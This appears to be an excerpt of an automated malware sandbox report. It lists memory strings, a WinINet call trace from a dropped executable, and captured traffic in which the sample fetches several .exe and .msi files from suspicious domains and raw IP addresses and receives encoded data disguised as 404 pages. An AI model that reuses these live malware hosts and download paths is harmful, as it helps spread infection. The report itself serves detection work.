                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000006.00000002.308935923.0000023970042000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308377033.0000023970041000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000006.00000002.308935923.0000023970042000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308377033.0000023970041000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000006.00000003.308306128.000002397005C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308807021.0000023970013000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.308371145.0000023970045000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.308371145.0000023970045000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000006.00000002.308878855.0000023970029000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308357030.0000023970047000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001D.00000003.434050256.000001A704395000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.434111178.000001A704802000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
                      Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
                      Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
                      Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /101.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
                      Source: global traffic | HTTP traffic detected: GET /11.msi HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                      Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                      Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /6236.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
                      Source: global traffic | HTTP traffic detected: GET /1.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                      Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:53 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 19{i+,GO0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:54 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:55 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:55 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:55 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:56 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:58:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:03 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 48I:82OOjQmFqdV@dfkK50
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Fri, 14 Jan 2022 12:57:45 GMT | Content-Type: text/html | Content-Length: 178 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
